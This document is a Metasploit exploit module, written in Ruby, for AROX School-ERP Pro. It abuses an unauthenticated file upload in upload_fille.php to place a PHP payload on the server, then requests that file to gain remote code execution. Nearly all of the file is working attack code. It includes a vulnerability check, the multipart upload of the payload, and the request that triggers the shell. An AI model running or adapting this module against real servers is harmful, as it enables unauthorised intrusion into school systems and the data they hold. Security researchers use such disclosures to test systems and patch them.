1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105 | ##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
super(update_info(info,
'Name' => "AROX School-ERP Pro Unauthenticated Remote Code Execution",
'Description' => %q(
This module exploits a command execution vulnerability in AROX School-ERP.
"import_stud.php" and "upload_fille.php" do not have session control.
Session start/check functions in Line 8,9,10 are disabled with slashes.
Therefore an unathenticated user can execute the command on the system.
),
'License' => MSF_LICENSE,
'Author' =>
[
'AkkuS <Özkan Mustafa Akkuş>', # Discovery & PoC & Metasploit module
],
'References' =>
[
['URL', 'http://www.pentest.com.tr/exploits/AROX-School-ERP-Pro-Unauthenticated-RCE-Metasploit.html'],
['URL', 'https://sourceforge.net/projects/school-erp-ultimate/'] # Download
],
'Platform' => 'php',
'Arch' => ARCH_PHP,
'Targets' => [['Automatic', {}]],
'Privileged' => false,
'DisclosureDate' => "Jun 17 2019",
'DefaultTarget' => 0))
register_options(
[
OptString.new('TARGETURI', [true, "Base ERP directory path", '/'])
]
)
end
def exec(shell)
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, "greatbritain", "greatbritain", "upload_data", "#{shell}") # shell url
})
end
def upload_shell(check)
fname = Rex::Text.rand_text_alpha_lower(8) + ".php"
@shell = "#{fname}"
pdata = Rex::MIME::Message.new
pdata.add_part("" + payload.encoded, 'application/octet-stream', nil, "form-data; name=\"txtdocname\"; filename=\"#{fname}\"")
pdata.add_part('Submit', nil, nil, 'form-data; name="btnsubmit"')
data = pdata.to_s
res = send_request_cgi({
'method' => 'POST',
'data' => data,
'agent' => 'Mozilla',
'ctype' => "multipart/form-data; boundary=#{pdata.bound}",
'uri' => normalize_uri(target_uri.path, "greatbritain", "greatbritain", "upload_fille.php")
})
if res && res.code == 200 && res.body =~ /Successfully/
print_status("Trying to upload #{fname}")
return true
else
fail_with(Failure::NoAccess, 'Error occurred during uploading!')
return false
end
end
def exploit
unless Exploit::CheckCode::Vulnerable == check
fail_with(Failure::NotVulnerable, 'Target is not vulnerable.')
end
if upload_shell(true)
print_good("Upload successfully.")
exec(@shell)
end
end
def check
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, "greatbritain", "greatbritain", "upload_fille.php")
})
unless res
vprint_error 'Connection failed'
return CheckCode::Unknown
end
if res && res.code == 200 && res.body =~ /upload_fille.php/
return Exploit::CheckCode::Vulnerable
end
return Exploit::CheckCode::Safe
end
end
|